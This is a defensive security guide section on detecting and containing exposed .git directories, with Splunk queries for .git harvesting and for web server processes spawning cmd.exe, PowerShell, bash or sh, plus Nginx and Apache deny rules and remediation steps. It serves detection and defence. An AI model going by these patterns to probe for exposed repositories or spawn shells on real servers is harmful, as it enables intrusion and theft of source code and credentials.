Detection and Containment Strategies
Detecting .git Folder Harvesting in Server Logs
Security operation centers can implement the following Splunk search query to quickly identify anomalous HTTP GET requests targeting hidden Git structures:
index=web_logs uri_path="*/.git/*" OR uri_path="*/.git"| stats count by src_ip, uri_path, status, user_agent
This query helps identify external entities attempting to download the Git configuration or index files. In a standard production environment, such requests should never occur and should be instantly blocked at the web application firewall (WAF) or web server level.
Detecting Post-Exploitation Execution
To detect potential Remote Code Execution stemming from source code exploitation, monitor the web server's host operating system for anomalous process spawning. For example, if a web server daemon (such as Nginx or IIS) spawns a command-line utility or PowerShell interface, it is a high-confidence indicator of active exploitation.
index=security event_id=1 parent_process_name IN ("w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "tomcat.exe") process_name IN ("cmd.exe", "powershell.exe", "bash", "sh")| table _time, host, parent_process_name, process_name, command_line
Containment and Remediation Guidance
If an exposed Git directory is discovered on a production system, security teams must assume that the entire application source code and all embedded credentials have been fully compromised. The following steps should be executed immediately:
Block Directory Access: Implement strict directory-blocking rules on the active web server configuration. For Nginx servers, add a configuration block to deny all access to .git folders:
location ~ /\.git {
deny all;
access_log off;
log_not_found off;
}
For Apache web servers, utilize an .htaccess rewrite rule:
RedirectMatch 404 /\.(git|github|svn|hg)/
Rotate All Credentials: Because credentials within historical commits must be treated as exposed, immediately rotate all database passwords, session signing keys, API tokens, and encryption secrets referenced anywhere in the source code history.
Conduct Web Root Audits: Scan the production web directory for unauthorized file modifications or newly created files (especially web shells with .php, .aspx, or .jsp extensions) written during the suspected compromise window.